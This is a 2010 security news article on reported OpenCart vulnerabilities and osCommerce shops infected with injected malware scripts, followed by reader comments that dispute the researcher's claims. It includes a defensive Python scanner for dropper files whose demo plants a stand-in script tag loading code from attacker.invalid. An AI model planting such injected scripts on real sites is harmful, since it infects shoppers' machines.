July 6th, 2010

Critical Security Holes In OpenCart, Multiple osCommerce Websites Infected With Malicious Code

A security researcher claims he’s found a total of fourteen dangerous vulnerabilities in OpenCart. However, because the project’s lead developer is apparently unwilling to address security issues, he recommends that people migrate away from OpenCart as soon as possible. Security researchers also warn that multiple osCommerce websites have been compromised during the last few days. The rogue code injected into their pages attempts to infect visitors with malware served from an external domain.

OpenCart has grown to be one of the most popular open source online shopping cart systems, along with osCommerce, Zen Cart and Magento. The software is used by thousands of online stores that handle sensitive customer information on a daily basis.

Considering that people expect to be in a secure environment when they shop online, one would think that security is one of the primary development goals for such a project. However, a Mexican security researcher named Eduardo Vela, who goes by the online moniker of sirdarckcat, claims this couldn’t be further from the truth when it comes to OpenCart.

In his blog Mr. Vela explains that some time ago he tried to report several serious vulnerabilities to the OpenCart project on behalf of a fellow researcher who discovered them. Amongst these, there was a Local File Inclusion (LFI) flaw, an issue allowing remote arbitrary code execution and a critical cross-site request forgery (CSRF) bug, which could be exploited to take complete control of the Web application.

According to the researcher, who adheres to responsible disclosure practices, Daniel Kerr, the OpenCart lead developer, asked not to be bothered. Since then, further security audits of OpenCart performed by Mr. Vela and his associates have revealed a total of fourteen dangerous vulnerabilities that, given Daniel Kerr’s attitude towards security, will probably never get fixed. Therefore, the only advice left to give to webmasters is to stop using the product entirely.

The compromises of osCommerce websites have been detected by Sucuri Security, a company selling website integrity monitoring solutions. An investigation into the incidents is ongoing, but it has been determined that all of the sites have been injected with a rogue script element loading code from an http://nt02. 3 address [intentionally malformed].

So far, most of the affected websites also had clandestine files uploaded to their /images folder. These files are called inclasses.php, loadclasses.php or phpclasses.php. “If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible,” Sucuri researcher David Dede advises.

The company is still trying to determine how the attackers succeeded in compromising the websites, but an osCommerce Remote File Injection (RFI) vulnerability disclosed about a month ago might be responsible. The bug is in “file_manager.php” and, according to a SecurityFocus advisory, is the result of a failure to properly sanitize user input.
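The two indicators Sucuri describes above (PHP files dropped into osCommerce’s /images folder, and a script element that pulls code from an external host) are easy to check for on your own install. The following scanner is an added example written for this article, not Sucuri’s tool or part of osCommerce; the file names come from the text, while the demo site tree, the allowlist of script hosts and the attacker.invalid host are constructed for the demonstration.

```python
import os
import re
import tempfile

# Dropper file names reported by Sucuri for the compromised osCommerce sites.
KNOWN_DROPPERS = {"inclasses.php", "loadclasses.php", "phpclasses.php"}

# Matches <script ... src="http://host/path"> and protocol-relative //host/path.
# Group 1 is the full URL, group 2 the host part.
SCRIPT_SRC_RE = re.compile(
    r'<script[^>]+src=["\']?((?:https?:)?//([^/"\'\s>]+)[^"\'\s>]*)',
    re.IGNORECASE,
)


def scan_images_dir(webroot):
    """Flag every .php file under images/; a real images folder should hold none."""
    findings = []
    for dirpath, _, files in os.walk(os.path.join(webroot, "images")):
        for name in files:
            if name.lower().endswith(".php"):
                reason = ("known dropper name" if name.lower() in KNOWN_DROPPERS
                          else "php file in images dir")
                findings.append((os.path.join(dirpath, name), reason))
    return findings


def find_external_scripts(html, allowed_hosts):
    """Return script URLs whose host is not on the site's allowlist."""
    allowed = {h.lower() for h in allowed_hosts}
    return [m.group(1) for m in SCRIPT_SRC_RE.finditer(html)
            if m.group(2).lower() not in allowed]


def scan_site(webroot, allowed_hosts):
    """Walk the webroot and collect both kinds of indicator into one report."""
    report = {"php_in_images": scan_images_dir(webroot), "external_scripts": []}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith((".php", ".html", ".htm", ".tpl")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for url in find_external_scripts(fh.read(), allowed_hosts):
                    report["external_scripts"].append((path, url))
    return report


def build_demo_site():
    """Constructed osCommerce-like tree with both indicators planted (demo only)."""
    root = tempfile.mkdtemp(prefix="osc_demo_")
    os.makedirs(os.path.join(root, "images"))
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "images", "loadclasses.php"), "w") as fh:
        fh.write("<?php /* planted dropper stand-in for the demo */ ?>")
    with open(os.path.join(root, "images", "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a")  # a legitimate image, must not be flagged
    with open(os.path.join(root, "includes", "footer.php"), "w") as fh:
        fh.write('<div>footer</div>'
                 '<script src="http://attacker.invalid/x.js"></script>')  # injected
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<script src="https://cdn.example.com/jquery.js"></script>')  # allowed
    return root


if __name__ == "__main__":
    site = build_demo_site()
    result = scan_site(site, allowed_hosts={"cdn.example.com"})
    for path, reason in result["php_in_images"]:
        print(f"PHP in images: {path} ({reason})")
    for path, url in result["external_scripts"]:
        print(f"external script: {path} -> {url}")
```

Run it against a real install by replacing `build_demo_site()` with the document root and listing every CDN or analytics host the shop legitimately loads scripts from; anything left over is worth a manual look, and any .php file under images/ is a finding regardless of its name.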

osCommerce is notorious for extremely long wait times between releases. The latest stable version is 2.2 RC2a, which was released more than two and a half years ago, on January 30, 2008. However, there are a few measures webmasters can take to protect their websites.


6 Responses to “Critical Security Holes In OpenCart, Multiple osCommerce Websites Infected With Malicious Code”

    1. Mr. Vela is full of shit. This guy has found nothing that poses a threat to OpenCart users. There is no CSRF issue because that was fixed as of 1.4.8, so Mr. Vela decided to drop a version back to beef up his numbers. Most of the security problems you found were related to the install/ directory not being deleted. We do advise all people using OpenCart to delete their install directory on stage 4 of their install.

      It’s like me telling the world cars are dangerous because some idiot smokes at a petrol station when filling his car up with gas.

      It’s all about trying to make themselves well known among the hacking blogs.

    2. I am a new user of OpenCart and this ‘alert’ is quite alarming. However, I am glad to see that Daniel was not afraid to face the music and add the other side of the story, colorful words and all. And the fact that Eduardo (countryman, don’t give the rest of us a bad name with your actions) has not responded to this post certainly leads me to believe that Eduardo was bending the truth and being disingenuous.

    3. If you search Eduardo’s past history you will find that he has made up quite a lot of fake security problems in open source projects. The one before OpenCart was SMF (small machine forum). It seems, though, that the people who write this information in the blogs don’t really care that he makes things up.

    4. It is easy to deny when you haven’t been hit. My OSC site was hacked last night and I have fixed it. This is a very real threat and you should research hacks on any online software you intend to use.

    5. OpenCart is not osCommerce and it handles security a lot better than osCommerce.

      There could be any number of reasons why your site was hacked. One of them could be a weak password; another could be that your hosting company got hacked. 99% of the time I find this is the case.

      Check your logs to see how the hacker got in. If you find they just got in with FTP access, it means your host was hacked.

    6. I found this article is really useful for me in my job. Thanks for sharing this useful information.
